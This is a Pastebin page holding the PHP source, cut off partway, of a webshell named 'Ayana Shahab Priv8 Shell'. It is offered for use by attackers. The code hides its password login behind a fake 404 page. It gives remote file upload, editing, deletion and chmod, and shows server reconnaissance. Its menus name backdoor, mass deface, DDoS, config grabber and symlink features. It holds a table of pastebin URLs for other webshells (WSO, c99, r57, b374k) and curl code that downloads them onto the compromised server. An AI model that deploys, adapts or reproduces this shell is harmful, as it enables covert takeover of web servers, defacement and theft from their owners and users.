SHARE
TWEET

Ayana Shahab Priv8 Shell

alin_tamvanz Nov 30th, 2016 719 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /***********************************************************************
  3. # Webshell : Ayana shahab shell
  4. # Author   : shutdown57 a.k.a alinko-kun
  5. # copyright (c) 2016  ~ linuxcode.org
  6. # Update   : http://pastebin.com/u/shutdown57
  7. # Greets   : PeSec Team , WithOutShadow , linuxcode.org
  8. ************************************************************************/
  9. session_start();
  10. error_reporting(0);
  11. ini_set('max_execution_time',0);
  12. set_time_limit(0);
  13. ini_set('error_log',NULL);
  14. date_default_timezone_set("Asia/Jakarta");
  15. define('judul','Ayana Shahab priv8 shell'); // Set title ;)
  16. define('ar','<i class=\'fa fa-arrow-right\'></i>');
  17. $s57_paswot = "39a54ee9b50e3484df126d83277593dc";//default password : achan , change with md5 type hash ;) .
  18.  
  19. function login() {
  20. $a_log ="<html><head><title>".judul."</title></head>";
  21. $a_log.="<font color=red>achan</font>@<font color=blue>".$_SERVER['HTTP_HOST']."</font>:<font color=green>".getcwd()."</font> $ sudo su";
  22. $a_log.="<form method='POST'><label for='pass'>[<font color=purple>sudo</font>]<font color=orange> password for achan</font>:</label><input type='password' name='pass' style='border:0;width:600px;'></form>";
  23. $a_log.="</body></html>";  
  24. if(empty($_GET['login'])=="achan"){
  25.     echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  26. <html><head>
  27. <title>404 Not Found</title>
  28. </head><body>
  29. <h1>Not Found</h1>
  30. <p>The requested URL '.$_SERVER['REQUEST_URI'].' was not found on this server.</p>
  31. <hr>
  32. <address>'.$_SERVER['SERVER_SOFTWARE'].' Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>
  33. </body></html>
  34. ';
  35. }else{
  36.     echo $a_log;
  37. }
  38.     exit;
  39. }
  40.  
  41. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  42.     if( empty( $s57_paswot ) ||
  43.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $s57_paswot) ) )
  44.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  45.     else
  46.        login();
  47. if(empty($_GET['i'])){
  48. $d=getcwd();
  49. }else{
  50. $d=$_GET['i'];
  51. }
  52. function tentang(){
  53.     $tentang="<center>
  54.     <pre class='w3-code w3-text-indigo w3-text-shadow'>";
  55.     $tentang.="
  56.     +-------------------------------------------------+
  57.     |          ~[ Ayana Shahab Priv8 Shell ]~         |
  58.     |         c0dename  : Mrs.sl33pyH34d              |
  59.     |         Author    : shutdown57 a.k.a alinko-kun |
  60.     |         Written   : PHP,HTML,CSS(w3.css),JS     |
  61.     +-------------------------------------------------+";
  62.     $tentang.="</pre>";
  63.     $tentang.="<h1 class='w3-indigo w3-text-shadow w3-animate-right'>Ayana Shahab priv8 shell</h1>";
  64.     $tentang.="<h2 class='w3-white w3-text-shadow w3-animate-left'>linuxcode.org ~ WithOutShadow ~ PeSec Team</h2>";
  65.     $tentang.="<h3 class='w3-indigo w3-text-shadow w3-animate-right'>Thanks for :</h3>";
  66.     $tentang.="<h4 class='w3-white w3-text-shadow w3-animate-left'>God , You , sunr-15 , google.com ,pastebin.com , [-]sh4d0w_99[!] , MRG#7 , indoXploit , devilzc0de , StackOverFlow , w3schools , tutorialpoint </h4>";
  67.     return $tentang;
  68. }
  69. function tentangAchan(){
  70.     $usia=date('Y')-1997;
  71.     $achan="<h3 class='w3-indigo w3-text-shadow w3-text-white w3-center'>About ayana shahab</h3>";
  72.    $achan.="<center><img src='http://s19.postimg.org/6rkx4tpcj/achan65.jpg' border='0'  style='width:200px;height:230px;cursor:zoom-in;' class='w3-center w3-circle' onclick=\"document.getElementById('achan').style.display='block';\"/></center>";
  73.    $achan.="<table class='w3-table w3-striped  w3-border w3-center'>";
  74.    $achan.="<tr class='w3-blue'><td>Name :</td><td>Ayana Shahab</td></tr>";
  75.    $achan.="<tr class='w3-light-blue'><td>Born :</td><td>Osaka, 3 June 1997 (age $usia)</td></tr>";
  76.    $achan.="<tr class='w3-grey'><td>Member :</td><td>JKT48 at Team K3 </td></tr>";
  77.    $achan.="<tr class='w3-blue-grey'><td>Career :</td><td>2011-2016 (JKT48 Team J) ,Dec 2016 (JKT48 Team K3)</td></tr>";
  78.    $achan.="</table><div class='w3-modal' style='display:none;' id='achan'><a href='javascript:;' onclick=\"document.getElementById('achan').style.display='none';\" class='w3-btnclose w3-hover-indigo w3-btn-block'>&times; close</a><img src='http://s19.postimg.org/6rkx4tpcj/achan65.jpg' width='100%' hiegth='100%'></div>";
  79.    $achan.='<hr><br><center><iframe width="560" height="315" src="https://www.youtube.com/embed/3Yt0dhb6ins?controls=0&amp;showinfo=0" frameborder="0" allowfullscreen></iframe></center>';
  80.    return $achan;
  81. }
  82. function tentangJKT48(){
  83.     $jkt="<div class='w3-container'><center><pre class='w3-code w3-text-indigo'>";
  84.    $jkt.="
  85. __      _ _  _______ _  _    ___   __
  86. \ \    | | |/ /_   _| || |  ( _ ) / /
  87. \ \_  | | ' /  | | | || |_ / _ \/ /
  88. / / |_| | . \  | | |__   _| (_) \ \
  89. /_/ \___/|_|\_\ |_|    |_|  \___/ \_\
  90.                                    
  91. Joyfull Kawaii Try to be the best
  92. ";
  93.   $jkt.="</pre>";
  94.   $jkt.="<iframe src='https://en.wikipedia.org/wiki/JKT48' style='width:80%;height:400px;' class='w3-indigo w3-border'></iframe>";
  95.   $jkt.="</center></div>";
  96. return $jkt;
  97. }
  98. $l=array(
  99.     'adminer'=>"https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php",
  100.     'wso'=>"http://pastebin.com/raw/N0eh3Q7Y",
  101.     'bejak'=>"http://pastebin.com/raw/sQJVES6y",
  102.     'indoxploit_shell'=>'http://pastebin.com/raw/nC6pWh5a',
  103.     'andela'=>'http://pastebin.com/raw/0dkmjaWJ',
  104.     'injection'=>'http://pastebin.com/raw/znH7r6Jr',
  105.     'sbh'=>'http://pastebin.com/raw/SMDJVTF8',
  106.     'bh'=>'http://pastebin.com/raw/3L2ESWeu',
  107.     'c99'=>'http://pastebin.com/raw/Ms0ptnpH',
  108.     'r57'=>'http://pastebin.com/raw/S9tzBgg3',
  109.     );
  110. function ambilcode($url, $isi) {
  111.         $fp = fopen($isi, "w");
  112.         $ch = curl_init();
  113.               curl_setopt($ch, CURLOPT_URL, $url);
  114.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  115.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  116.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  117.               curl_setopt($ch, CURLOPT_FILE, $fp);
  118.         return curl_exec($ch);
  119.               curl_close($ch);
  120.         fclose($fp);
  121.         ob_flush();
  122.         flush();
  123.     }
  124. function ukuranupil($upil){
  125.     $size = filesize($upil)/1024;
  126. $size = round($size,3);
  127. if($size >= 1024){
  128. $size = round($size/1024,2).' MB';
  129. }else{
  130. $size = $size.' KB';
  131. }
  132. return $size;
  133. }
  134. function perms($file)
  135. {
  136.     if($mode=@fileperms($file)){
  137.         $perms='';
  138.         $perms .= ($mode & 00400) ? 'r' : '-';
  139.         $perms .= ($mode & 00200) ? 'w' : '-';
  140.         $perms .= ($mode & 00100) ? 'x' : '-';
  141.         $perms .= ($mode & 00040) ? 'r' : '-';
  142.         $perms .= ($mode & 00020) ? 'w' : '-';
  143.         $perms .= ($mode & 00010) ? 'x' : '-';
  144.         $perms .= ($mode & 00004) ? 'r' : '-';
  145.         $perms .= ($mode & 00002) ? 'w' : '-';
  146.         $perms .= ($mode & 00001) ? 'x' : '-';
  147.         return $perms;
  148.     }
  149.     else return "??????????";
  150. }
  151. function lmodif($upil){
  152.     $mod=date('d M Y [H:m]',filemtime($upil));
  153.     return $mod;
  154. }
  155. function owngro($file){
  156. $name=@posix_getpwuid(@fileowner($file));
  157. $group=@posix_getgrgid(@filegroup($file));
  158. $owngro=$name['name'].":".$group['name'];
  159. return $owngro;
  160. }
  161. $html_a='<!DOCTYPE html>';
  162. $html_a.='<html><head><title>'.judul.'</title><link rel="ICON" type="text/css" href="https://pbs.twimg.com/profile_images/740108670994763776/WvsElzwN.jpg">';
  163.  
  164. $html_a.='
  165. <meta name="author" content="shutdown57">
  166. <meta name="keywords" content="shutdown57,ayana shahab shell">
  167. <meta name="description" content="ayana shahab shell c0ded  by shutdown57">
  168. <link rel="stylesheet" href="http://www.w3schools.com/lib/w3.css">
  169. <!--<link rel="stylesheet" href="w3.css">-->
  170. <link rel="stylesheet" href="http://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.min.css">';
  171. $html_a.='</head><body onload="haposurl();"><style type="text/css">
  172.     *{font-size:12px;font-family: courier new;}a{text-decoration: none;}
  173. </style>';
  174. $nav_a ='<ul class="w3-navbar w3-left-align w3-large w3-indigo">';
  175. $nav_a.='<li><a href="?index.php" class="w3-hover-white"><i class="fa fa-home"></i> Home</a></li>';
  176. $nav_a.='<li class="w3-dropdown-hover"><a href="#" class="w3-hover-white"><i class="fa fa-user"></i> About</a>';
  177. $nav_a.='<div class="w3-dropdown-content w3-white">';
  178. $nav_a.='<a href="?a=tentang&i='.$d.'" class="w3-hover-indigo">'.ar.' about this</a>';
  179. $nav_a.='<a href="?a=achan&i='.$d.'" class="w3-hover-indigo">'.ar.' about ayana shahab</a>';
  180. $nav_a.='<a href="?a=jkt48&i='.$d.'" class="w3-hover-indigo">'.ar.' about JKT48</a></div></li>';
  181. $nav_a.='<li class="w3-dropdown-hover"><a href="?a=terminal&i'.$d.'" class="w3-hover-white"><i class="fa fa-terminal"></i> Terminal</a>';
  182. $nav_a.='<div class="w3-dropdown-content w3-white">';
  183. $nav_a.='<a href="?a=shell&i='.$d.'" class="w3-hover-indigo">'.ar.' Shell <i class="fa fa-linux"></i></a>';
  184. $nav_a.='<a href="?a=cmd&i='.$d.'" class="w3-hover-indigo">'.ar.' CMD <i class="fa fa-windows"></i></a>';
  185. $nav_a.='</div></li>';
  186. $nav_a.='<li class=" w3-dropdown-hover"><a href="#" class="w3-hover-white "><i class="fa fa-database"></i> Database assesment</a>';
  187. $nav_a.='<div class="w3-dropdown-content w3-white"> ';
  188. $nav_a.='<a href="?a=svc&i='.$d.'" class="w3-hover-indigo">'.ar.' SQLi vuln checker</a>';
  189. $nav_a.='<a href="?a=adminer&i='.$d.'" class="w3-hover-indigo">'.ar.' Adminer</a>';
  190. $nav_a.='<a href="?a=dbdump&i='.$d.'" class="w3-hover-indigo">'.ar.' DB Dump</a>';
  191. $nav_a.='</div></li>';
  192. $nav_a.='<li class="w3-dropdown-hover"><a href="#" class="w3-hover-white "><i class="fa fa-bold"></i> String tools</a>';
  193. $nav_a.='<div class="w3-dropdown-content w3-white">';
  194. $nav_a.='<a href="?a=hi&i='.$d.'" class="w3-hover-indigo">'.ar.' Hash identify</a>';
  195. $nav_a.='<a href="?a=ph&i='.$d.'" class="w3-hover-indigo">'.ar.' Password Hash</a>';
  196. $nav_a.='<a href="?a=ed&i='.$d.'" class="w3-hover-indigo">'.ar.' Enc0de & Dec0de</a>';
  197. $nav_a.='<a href="?a=rs&i='.$d.'" class="w3-hover-indigo">'.ar.' Replace String</a>';
  198. $nav_a.='</div></li>';
  199. $nav_a.='<li class="w3-dropdown-hover"><a href="#" class="w3-hover-white "><i class="fa fa-universal-access"></i> Backdoor</a>';
  200. $nav_a.='<div class="w3-dropdown-content w3-white">';
  201. $nav_a.='<a href="?a=wso&i='.$d.'" class="w3-hover-indigo">'.ar.' WSO</a>';
  202. $nav_a.='<a href="?a=injection&i='.$d.'" class="w3-hover-indigo">'.ar.' 1n73ction</a>';
  203. $nav_a.='<a href="?a=bejak&i='.$d.'" class="w3-hover-indigo">'.ar.' b374k</a>';
  204. $nav_a.='<a href="?a=andela&i='.$d.'" class="w3-hover-indigo">'.ar.' andela</a>';
  205. $nav_a.='<a href="?a=idx&i='.$d.'" class="w3-hover-indigo">'.ar.' indoxploit</a>';
  206. $nav_a.='<a href="?a=bh&i='.$d.'" class="w3-hover-indigo">'.ar.' Blackhat</a>';
  207. $nav_a.='<a href="?a=sbh&i='.$d.'" class="w3-hover-indigo">'.ar.' Surabaya Blackhat</a>';
  208. $nav_a.='<a href="?a=c&i='.$d.'" class="w3-hover-indigo">'.ar.' c99</a>';
  209. $nav_a.='<a href="?a=r&i='.$d.'" class="w3-hover-indigo">'.ar.' r57</a>';
  210. $nav_a.='</div></li>';
  211. $nav_a.='<li class="w3-dropdown-hover"><a href="#" class="w3-hover-white "><i class="fa fa-firefox"></i> Web analisist</a>';
  212. $nav_a.='<div class="w3-dropdown-content w3-white">';
  213. $nav_a.='<a href="?a=cg&i='.$d.'" class="w3-hover-indigo">'.ar.' Config grabber</a>';
  214. $nav_a.='<a href="?a=af&i='.$d.'" class="w3-hover-indigo">'.ar.' admin finder</a>';
  215. $nav_a.='<a href="?a=md&i='.$d.'" class="w3-hover-indigo">'.ar.' Mass deface</a>';
  216. $nav_a.='<a href="?a=wprp&i='.$d.'" class="w3-hover-indigo">'.ar.' WPRessPass</a>';
  217. $nav_a.='<a href="?a=jrp&i='.$d.'" class="w3-hover-indigo">'.ar.' JoomRessPass</a>';
  218. $nav_a.='<a href="?a=net&i='.$d.'" class="w3-hover-indigo">'.ar.' NetSploit</a>';
  219. $nav_a.='<a href="?a=ddos&i='.$d.'" class="w3-hover-indigo">'.ar.' DDoS</a>';
  220. $nav_a.='<a href="?a=em&i='.$d.'" class="w3-hover-indigo">'.ar.' eMail</a>';
  221. $nav_a.='<a href="?a=zh&i='.$d.'" class="w3-hover-indigo">'.ar.' ZONE-H</a>';
  222. $nav_a.='<a href="?a=sym&i='.$d.'" class="w3-hover-indigo">'.ar.' Symlink</a>';
  223. $nav_a.='<a href="?a=rdp&i='.$d.'" class="w3-hover-indigo">'.ar.' RDP tools</a>';
  224. $nav_a.='<a href="?a=fr&o='.$d.'" class="w3-hover-indigo">'.ar.' Fake root</a>';
  225. $nav_a.='</div></li>';
  226. $nav_a.='<li class="w3-dropdown-hover"><a href="#" class="w3-hover-white"><i class="fa fa-file-o"></i> SC Deface</a>';
  227. $nav_a.='<div class="w3-dropdown-content w3-white">';
  228. $nav_a.='<a href="?a=wos&i='.$d.'" class="w3-hover-indigo">'.ar.' WithOutShadow</a>';
  229. $nav_a.='<a href="?a=ps&i='.$d.'" class="w3-hover-indigo">'.ar.' PeSeC Team</a>';
  230. $nav_a.='</div></li>';
  231.     if(isset($_GET['s'])){
  232.    $nav_a.="<li class='w3-dropdown-hover'>";
  233.    $nav_a.="<a href='#' class='w3-hover-white '>? Action</a>";
  234.    $nav_a.="<div class='w3-dropdown-content'>";
  235.    $nav_a.="<a href='?a=rename&i=$d&s=".$_GET['s']."'>".ar." Rename</a>";
  236.    $nav_a.="<a href='?a=edit&i=$d&s=".$_GET['s']."'>".ar." Edit</a>";
  237.    $nav_a.="<a href='?a=unlink&i=$d&s=".$_GET['s']."'>".ar." Delete</a>";
  238.    $nav_a.="<a href='?a=chmod&i=$d&s=".$_GET['s']."'>".ar." Chmod</a>";
  239.    $nav_a.="<a href='?a=download&i=$d&s=".$_GET['s']."'>".ar." Download</a>";
  240.    $nav_a.="</div></li> ";
  241.     }
  242.  $nav_a.='<li title="Ayana Shahab Member JKT48 at Team K3" class="w3-dropdown-hover"><b><a class="w3-text-shadow w3-center w3-hover-pale-indigo" href="#"><i class="fa fa-paw"></i> Ayana Shahab Priv8 Shell <i class="fa fa-paw"></i></a></b>';
  243.  $nav_a.='<div class="w3-dropdown-content w3-white">';
  244. $nav_a.='<a href="?a=themes&i='.$d.'" class="w3-hover-indigo">'.ar.' Change Themes</a>';
  245. $nav_a.='<a href="?a=pass&i='.$d.'" class="w3-hover-indigo">'.ar.' Change Password</a></div></li>';
  246.  $nav_a.='<li class="w3-hover-white w3-right"><a href="?a=logout" class="w3-hover-white"><i class="fa fa-sign-out"></i>Logout</a></li></ul>';//end
  247.  echo $html_a;
  248.  echo $nav_a;
  249.  
  250.     $disabled=(is_writable($d)) ? : "disabled";
  251.     if(isset($_POST['upfile'])){
  252.     $files = array(
  253.                     '1' => $_FILES['files']['name'],
  254.                     '2' => $_FILES['files2']['name'],
  255.                     '3' => $_FILES['files3']['name'],
  256.                     '4' => $_FILES['files4']['name'],
  257.                     '5' => $_FILES['files5']['name']
  258.                     );
  259.     $tmp= array(
  260.         '1' => $_FILES['files']['tmp_name'],
  261.         '2' => $_FILES['files2']['tmp_name'],
  262.         '3' => $_FILES['files3']['tmp_name'],
  263.         '4' => $_FILES['files4']['tmp_name'],
  264.         '5' => $_FILES['files5']['tmp_name']
  265.         );
  266.     $dir=array(
  267.         '1' => $_POST['dir']."/",
  268.         '2' => $_POST['dir2']."/",
  269.         '3' => $_POST['dir3']."/",
  270.         '4' => $_POST['dir4']."/",
  271.         '5' => $_POST['dir5']."/"
  272.         );
  273.     move_uploaded_file($tmp['1'],$dir['1'].$files['1']);
  274.     move_uploaded_file($tmp['2'],$dir['2'].$files['2']);
  275.     move_uploaded_file($tmp['3'],$dir['3'].$files['3']);
  276.     move_uploaded_file($tmp['4'],$dir['4'].$files['4']);
  277.     move_uploaded_file($tmp['5'],$dir['5'].$files['5']);
  278.     echo "<script>
  279.    alert('Upload done!');
  280.    </script>";
  281. }
  282. if(is_writable($d)){
  283.     $stat='<font color="indigo">Writable [OK]</font>';
  284. }else{
  285.     $stat='<font color="grey">Not Writable [Read-Only]</font>';
  286. }
  287.  
  288.     echo'<script type="text/javascript">
  289.     function ijolno(anjing,kucing){
  290.         document.getElementById(anjing).style.display="none";
  291.         document.getElementById(kucing).style.display="block";
  292.     }
  293.     function upload(){
  294.         document.getElementById("upload5").style.display="block";
  295.     }
  296. </script>';
  297.  
  298. echo'<div class="w3-modal " id="upload5" style="display:none;"><a href="javascript:;" onclick="document.getElementById(\'upload5\').style.display=\'none\';" class="w3-closebtn w3-hover-indigo" style="top:0;right:0;position:fixed;">&times;</a>';
  299. echo'<div class="w3-container w3-modal-content w3-indigo w3-card-8 w3-center"><h3 class="w3-white w3-text-shadow">Uploader Files</h3>';
  300. echo'<p> status upload file : '.$stat.'</p><table class="w3-table w3-border"><tr><td>file</td><td>Target Dir</td></tr><tr><td>';
  301. echo'<form method="Post" enctype="multipart/form-data">';
  302. $form_a='<input type="file" name="files" '.$disabled.'></td><td>';
  303. $form_a.='<input type="text" name="dir" value="'.$d.'" class="w3-input"></td></tr><tr><td>';
  304. $form_a.='<input type="file" name="files2" '.$disabled.'></td><td>';
  305. $form_a.='<input type="text" name="dir2" value="'.$d.'" class="w3-input" ></td></tr><tr><td>';
  306. $form_a.='<input type="file" name="files3"  '.$disabled.'></td><td>';
  307. $form_a.='<input type="text" name="dir3" value="'.$d.'" class="w3-input"></td></tr><tr><td>';
  308. $form_a.='<input type="file" name="files4" '.$disabled.'></td><td>';
  309. $form_a.='<input type="text" name="dir4" value="'.$d.'" class="w3-input"></td></tr><tr><td>';
  310. $form_a.='<input type="file" name="files5" '.$disabled.'></td><td>';
  311. $form_a.='<input type="text" name="dir5" value="'.$d.'" class="w3-input"></td></tr></table><br>';
  312. $form_a.='<input type="submit" name="upfile" class="w3-btn w3-btn-block w3-white" value="upload all"></form></div></div>';
  313. echo $form_a;
  314. if(!function_exists('posix_getegid')) {
  315.     $user = @get_current_user();
  316.     $uid = @getmyuid();
  317.     $gid = @getmygid();
  318.     $group = "?";
  319. } else {
  320.     $uid = @posix_getpwuid(posix_geteuid());
  321.     $gid = @posix_getgrgid(posix_getegid());
  322.     $user = $uid['name'];
  323.     $uid = $uid['uid'];
  324.     $group = $gid['name'];
  325.     $gid = $gid['gid'];
  326. }
  327.  
  328. function convertByte($s) {
  329. if($s >= 1073741824)
  330. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  331. elseif($s >= 1048576)
  332. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  333. elseif($s >= 1024)
  334. return sprintf('%1.2f',$s / 1024 ) .' KB';
  335. else
  336. return $s .' B';
  337. }
  338. $os=(preg_match('/linux|Linux/',php_uname())) ? "<i class='fa fa-linux' title='linux'></i>" : "<i class='fa fa-windows' title='windows'></i>";
  339. $sm= ini_get('safe_mode') ? "<font color=indigo> ON<?font>" : "<font color=grey> OFF</font>";
  340. $mysql= function_exists('mysql_connect')?"<font color=indigo> ON</font>":"<font color=grey> OFF</font>";
  341. $url_fp =ini_get('url_fopen')?"<font color=indigo> ON</font>":"<font color=grey> OFF</font>";
  342. $curl=function_exists('curl_init')?"<font color=indigo> ON</font>":"<font color=grey> OFF</font>";
  343. $df=ini_get('disable_functions') ? substr(ini_get('disable_functions'),0,50).",etc..." : "<font color=grey> NONE</font>";
  344.  
  345. echo "<hr>
  346. <div class='w3-container w3-indigo'>
  347. <div class='w3-row'>
  348. <div class='w3-col m6 l6 s12 w3-animate-right'>
  349. HOSTNAME : ".$_SERVER['HTTP_HOST']."<br>
  350. Free Disk : ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."<br>
  351. IP SERVER : ".gethostbyname($_SERVER['HTTP_HOST'])." | YOUR IP : ".$_SERVER['REMOTE_ADDR']." <br>
  352. SERVER SOFTWARE : ".$_SERVER['SERVER_SOFTWARE']."<br>
  353. User: <font color=indigo>".$user."</font> (".$uid.") Group: <font color=indigo>".$group."</font> (".$gid.")<br>
  354. PHP version : ".phpversion()."-[<a href='?a=phpinfo&i=$d'>PHPINFO</a>]
  355. CURL:".$curl."|safemode:".$sm."|URL FOPEN:".$url_fp."|MySQL:".$mysql."<br>
  356. UNAME : ".php_uname()."<br>
  357. DISABLE FUNCTIONS :".$df."<br>
  358. </div>
  359. <div class='w3-col m6 l6 s12 w3-animate-left'>
  360. <form method='post' enctype='multipart/form-data'>
  361. <table class='w3-table'><tr><td>File :</td><td>
  362. <input type='file' name='upfile' class='w3-input w3-animate-input' style='width:200px;' ".$disabled."></td><td><button type='submit' name='subup' class='w3-btn w3-white w3-text-shadow'><i class='fa fa-upload'></i> upload</button></td></tr></table></form>";
  363. if(isset($_POST['subup'])){
  364.         if(move_uploaded_file($_FILES['upfile']['tmp_name'],$d."/".$_FILES['upfile']['name'])){
  365.             echo "<script>
  366.             alert('upload done!');
  367.             </script>";
  368.         }else{
  369.             echo "<script>
  370.             alert('upload failed');
  371.             </script>";
  372.         }
  373.     }
  374.  
  375. echo"
  376. <table class='w3-table'><tr><td><a href=\"javascript:ijolno('sengelek','sengapek');\"><i class='fa fa-hand-o-right' style='font-size:24px;'></i></a></td><td>
  377. <div id='sengapek' style='display:none;'>
  378. <form method='get'>
  379. <input type='text' value='".$d."' name='i' class='w3-input w3-animate-input w3-indigo' style='width:200px'>
  380. </form>
  381. </div>
  382. <div id='sengelek'>
  383.     ";
  384.  
  385. $d=str_replace('\\','/',$d);
  386. $path = explode('/',$d);
  387.  
  388. foreach($path as $id=>$curdir){
  389. if($curdir == '' && $id == 0){
  390. $a = true;
  391. echo '<a href="?i=/">/</a>';
  392. continue;
  393. }
  394. if($curdir == '') continue;
  395. echo '<a href="?i=';
  396. for($i=0;$i<=$id;$i++){
  397. echo "$path[$i]";
  398. if($i != $id) echo "/";
  399. }
  400. echo '">'.$curdir.'</a>/';
  401. }
  402. $pwd=str_replace('\\','/',getcwd());
  403. (is_writable($d))?$stat=" ~ <font color=indigo>WRITABLE</font>" :$stat="<font color=grey>NOT WRITABLE</font>";
  404. echo $stat."</div></td></tr><tr class='w3-center'><td colspan='2'><a href='?index.php' class='w3-margin-left' title='home page.'><i class='fa fa-home' style='font-size:20px;'></i></a> <a href='javascript:history.go(-1);' class='w3-margin-left' title='go back one page,'><i class='fa fa-arrow-left' style='font-size:20px;'></i></a>  <a href='javascript:history.go(+1);' class='w3-margin-left' title='go forward one page.'><i class='fa fa-arrow-right' style='font-size:20px;'></i></a> <a href='".$_SERVER['REQUEST_URI']."' class='w3-margin-left' title='refresh page'><i class='fa fa-refresh' style='font-size:20px;'></i></a> <a href='javascript:;' class='w3-margin-left' onclick='upload();' title='Show uploader'><i class='fa fa-upload' style='font-size:20px;'></i></a></td></tr></table></div></div></div><hr>";
  405. if(empty($_GET['a'])){
  406.     echo'<form method="POST"><table class="w3-table w3-responsive w3-striped">';
  407.     echo'<thead class="w3-indigo w3-hover-indigo"><th style="width:20px;">No.</th><th style="width:20px;">^</th><th style="width:250px;max-width:300px;">Name</th><th style="width:100px;">Size</th><th style="width:130px;max-width:180px;">Type</th><th style="width:160px;max-width:190px;">Group:Owner</th><th style="width:120px;">Permission</th><th style="width:150px;max-width:180px;">Last Modified</th><th style="width:120px;">Action</th></thead>';
  408.     echo "<tr class='w3-hover-indigo'><td>0</td><td></td><td><a href='?i=".dirname("$d")."'><i class='fa fa-arrow-left'></i></a></td><td>--</td><td>achan/link</td><td>achan:ayana</td><td>~</td><td>~</td><td>
  409.      <div class='w3-dropdown-hover'>
  410.  <a  href='#' class='w3-btn w3-indigo' style='border-radius:100%;-webkit-border-radius:100%;-o-border-radius:100%;-moz-border-radius:100%;'>?</a>
  411.  <div class='w3-dropdown-content w3-border'>
  412.    <a href='?a=mkdir&i=$d'>make directory</a>
  413.    <a href='?a=mkfile&i=$d'>make file</a>
  414.  </div>
  415. </div>
  416.     </td>";
  417.     $s=scandir($d);
  418.     $no=1;
  419.     $total_file=0;
  420.     $total_dir=0;
  421.     foreach ($s as $d2) {
  422.     if(!is_dir("$d/$d2")||$d2=='.'||$d2=='..')continue;
  423.     if(mime_content_type("$d/$d2")){
  424.         $mime=mime_content_type("$d/$d2");
  425.     }else{
  426.         $mime="unknow/denied";
  427.     }
  428.     echo "<tr class='w3-hover-indigo'><td>".$no++."</td><td><input type='checkbox' class='w3-check' name='cekd[]' value='".$d."/".$d2."' ></td><td><i class='fa fa-folder'></i> <a href='?i=$d/$d2' title='dir : $d2'>$d2</a></td><td>".ukuranupil("$d/$d2")."</td><td>".$mime."</td><td>".owngro("$d/$d2")."</td><td>".perms("$d/$d2")."</td><td>".lmodif("$d/$d2")."</td><td>
  429.      <div class='w3-dropdown-hover'>
  430.  <a  href='#' class='w3-btn w3-indigo' style='border-radius:100%;-webkit-border-radius:100%;-o-border-radius:100%;-moz-border-radius:100%;'>?</a>
  431.  <div class='w3-dropdown-content w3-border'>
  432.    <a href='?a=rename&i=$d&s=$d2'>Rename</a>
  433.    <a href='?a=rmdir&i=$d&s=$d2'>Delete</a>
  434.    <a href='?a=chmod&i=$d&s=$d2'>Chmod</a>
  435.  </div>
  436. </div>
  437.     </td></tr>";
  438.     $total_dir++;
  439.     }
  440.     foreach ($s as $f) {
  441.         if(!is_file("$d/$f")||$f=='.'||$f=='..')continue;
  442.     if(mime_content_type("$d/$f")){
  443.         $mime= mime_content_type("$d/$f");
  444.     }else{
  445.         $mime="unknow/denied";
  446.     }
  447.     echo "<tr class='w3-hover-indigo'><td>".$no++."</td><td><input type='checkbox' class='w3-check' name='cekf[]' value='".$d."/".$f."' ></td><td><i class='fa fa-file'></i> <a href='?i=$d&a=view&s=$f' title='file : $f'>$f</a></td><td>".ukuranupil("$d/$f")."</td><td>".$mime."</td><td>".owngro("$d/$f")."</td><td>".perms("$d/$f")."</td><td>".lmodif("$d/$f")."</td><td>
  448.          <div class='w3-dropdown-hover'>
  449.  <a href='#' class='w3-btn w3-indigo' style='border-radius:100%;-webkit-border-radius:100%;-o-border-radius:100%;-moz-border-radius:100%;'>?</a>
  450.  <div class='w3-dropdown-content w3-border'>
  451.    <a href='?a=rename&i=$d&s=$f'>Rename</a>
  452.      <a href='?a=edit&i=$d&s=$f'>Edit</a>
  453.    <a href='?a=unlink&i=$d&s=$f'>Delete</a>
  454.    <a href='?a=chmod&i=$d&s=$f'>Chmod</a>
  455.    <a href='?a=download&i=$d&s=$f'>Download</a>
  456.  </div>
  457. </div> </td></tr>";
  458. $total_file++;
  459.     }
  460.     echo '
  461. <tr class="w3-indigo w3-text-shadow"><td colspan="9">
  462. <select name="select" onchange="this.form.submit()" style="width:100%" class="w3-input w3-indigo w3-hover-white">
  463. <option> action selected files | total : '.$total_file.' files & '.$total_dir.' directories | where : '.$d.'</option>
  464. <option value="del">delete</option>
  465. <option value="backup">backUp</option>
  466. <option value="unzip">unzip</option>
  467. <option value="gz">compress .gz</option>
  468. <option value="tar"> compress .tar.gz </option>
  469. </select></td></tr>
  470. </table></form>';
  471.  
  472. if(isset($_POST['select'])){
  473.     $file=$_POST['cekf'];
  474.     $dir=$_POST['cekd'];
  475.     if($_POST['select']=='del'){
  476.         if($_POST['cekf']){
  477.            
  478.             foreach ($file as $cekf) {
  479.                 if(unlink($cekf)){
  480.                     echo"<meta http-equiv='refresh' content=0;url=>";
  481.                 }
  482.             }
  483.         }
  484.     if($_POST['cekd']){
  485.        
  486.         foreach ($dir as $cekd) {
  487.         if(rmdir($cekd)){
  488.             echo"<meta http-equiv='refresh' content=0;url=>";
  489.         }
  490.         }}}elseif($_POST['select']=='backup'){
  491. if($_POST['cekf']){
  492.  
  493.     foreach ($file as $copy) {
  494.         $copi=basename($copy);
  495.         if(!file_exists("backup")){
  496.         @mkdir('backup');
  497.     }
  498.         if(copy($copy,"backup/".basename($copy))){
  499.         echo"<meta http-equiv='refresh' content=0;url=?i=".getcwd()."/backup>";
  500.         }else{
  501.             echo "[<font color=grey>FAIL</font>]--> ".basename($Copy)."<br>";
  502.         }
  503.     }
  504. }
  505. }elseif ($_POST['select']=='unzip') {
  506.     @mkdir("extract");
  507.     foreach ($file as $unzip) {
  508.         $zip = new ZipArchive;
  509. $res = $zip->open($unzip);
  510.  
  511. if ($res === TRUE) {
  512.  
  513. $zip->extractTo("extract");
  514.  
